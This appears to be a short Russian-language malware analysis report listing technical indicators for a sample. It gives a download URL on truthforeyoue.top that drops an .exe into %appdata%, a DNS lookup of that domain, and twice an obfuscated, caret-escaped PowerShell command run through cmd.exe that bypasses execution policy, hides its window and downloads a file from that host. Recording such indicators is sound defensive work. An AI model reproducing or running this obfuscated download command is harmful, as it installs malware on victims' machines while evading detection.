Техническая информация
- http://truthforeyoue.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OwErS^hELL.E^Xe -e^xEC^U^TI^o^N^pO^l^i^cY^ byp^A^SS -nopRO^FI^LE -Wi^nDOws^tY^le HidDe^n ^(New-^OB^Je^cT^ S^ysT^em.^NeT.^WebcLI^E^n^t).do^wnLo^A^DFI^Le(^'http://truthforeyoue.to...
- DNS ASK tr####oreyoue.top
- '<SYSTEM32>\cmd.exe' /c "P^OwErS^hELL.E^Xe -e^xEC^U^TI^o^N^pO^l^i^cY^ byp^A^SS -nopRO^FI^LE -Wi^nDOws^tY^le HidDe^n ^(New-^OB^Je^cT^ S^ysT^em.^NeT.^WebcLI^E^n^t).do^wnLo^A^DFI^Le(^'http://truthforeyoue.to...' (со скрытым окном)